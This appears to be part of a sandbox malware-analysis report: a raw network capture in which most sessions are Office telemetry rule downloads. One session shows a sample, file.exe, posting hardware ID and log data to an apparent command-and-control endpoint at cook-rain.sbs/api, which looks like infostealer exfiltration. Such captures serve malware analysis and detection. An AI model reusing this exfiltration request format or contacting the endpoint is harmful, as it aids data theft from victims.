                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2185&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2830&recv_bytes=16006&delivery_rate=1286910&cwnd=141&unsent_bytes=0&cid=3953d82e04df646e&ts=947&x=0"
                                                                                                                                                                        2024-11-21 09:37:28 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                        2024-11-21 09:37:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        29192.168.2.64974013.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:28 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:28 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                                                                                                        x-ms-request-id: 793d7516-201e-0003-7fca-3bf85a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093728Z-r1d97b99577sdxndhC1TEBec5n0000000acg000000002cud
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:29 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        30192.168.2.64974213.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:28 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:28 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                        x-ms-request-id: 2b92647c-c01e-00a2-646f-3b2327000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093728Z-r1d97b99577kk29chC1TEBemmg0000000a4g00000000cqzc
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        31192.168.2.64974113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:28 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:29 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                        ETag: "0x8DC582B9748630E"
                                                                                                                                                                        x-ms-request-id: 367ebca4-601e-0070-6762-3ba0c9000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093729Z-178bfbc474b9xljthC1NYCtw94000000014000000000bxac
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:29 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        32192.168.2.64974313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:28 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:29 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 404
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                        x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093729Z-178bfbc474bh5zbqhC1NYCkdug0000000160000000009xq4
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:29 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        33192.168.2.64974413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:28 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:29 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                        x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093729Z-1777c6cb754lv4cqhC1TEB13us0000000au000000000ectk
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:29 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        34192.168.2.649750188.114.97.34434540C:\Users\user\Desktop\file.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:30 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=KAYWMF1FAYEH2X02W6J
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 19975
                                                                                                                                                                        Host: cook-rain.sbs
                                                                                                                                                                        2024-11-21 09:37:30 UTC15331OUTData Raw: 2d 2d 4b 41 59 57 4d 46 31 46 41 59 45 48 32 58 30 32 57 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 31 42 30 35 45 31 41 45 31 45 46 38 38 32 44 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 4b 41 59 57 4d 46 31 46 41 59 45 48 32 58 30 32 57 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 41 59 57 4d 46 31 46 41 59 45 48 32 58 30 32 57 36 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                                                                        Data Ascii: --KAYWMF1FAYEH2X02W6JContent-Disposition: form-data; name="hwid"91B05E1AE1EF882D63CFCF7E6C45F838--KAYWMF1FAYEH2X02W6JContent-Disposition: form-data; name="pid"3--KAYWMF1FAYEH2X02W6JContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                                                                        2024-11-21 09:37:30 UTC4644OUTData Raw: a5 31 16 55 bb 32 f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee
                                                                                                                                                                        Data Ascii: 1U2+?2+?2+?o?Mp5
                                                                                                                                                                        2024-11-21 09:37:31 UTC988INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:31 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=dkjaftobvnhpbkrt355q26d63l; expires=Mon, 17-Mar-2025 03:24:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mk2KtdyMAFo28Pcb%2BwSLhDH4piTqjiD6xLJLoSU2wgbgvFr6%2Fh7o4Gi4GMwTSB7eUFDWwMnasrvVglovrL%2BVL6Z8s1X9iSC1iu0TXYYOo%2FQmwmhX%2B18iQAmzrLNiDF4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8e5fb3985e894234-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1588&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2829&recv_bytes=20935&delivery_rate=1834170&cwnd=171&unsent_bytes=0&cid=65aa88aadb077970&ts=865&x=0"
                                                                                                                                                                        2024-11-21 09:37:31 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                        2024-11-21 09:37:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        35192.168.2.64974513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:30 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:31 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 428
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                        ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                        x-ms-request-id: c49e358a-d01e-008e-6463-3b387a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093731Z-178bfbc474bgvl54hC1NYCsfuw000000019g00000000633q
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:31 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        36192.168.2.64974913.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:31 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:31 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                        ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                        x-ms-request-id: 3029707a-401e-0047-3163-3b8597000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093731Z-178bfbc474bkvpdnhC1NYCuu2w00000001f00000000001yh
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:31 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        37192.168.2.64974613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:31 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:31 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 499
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                        ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                        x-ms-request-id: 8157cc8d-f01e-0003-1961-3b4453000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093731Z-178bfbc474bfw4gbhC1NYCunf4000000016g00000000e1tf
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
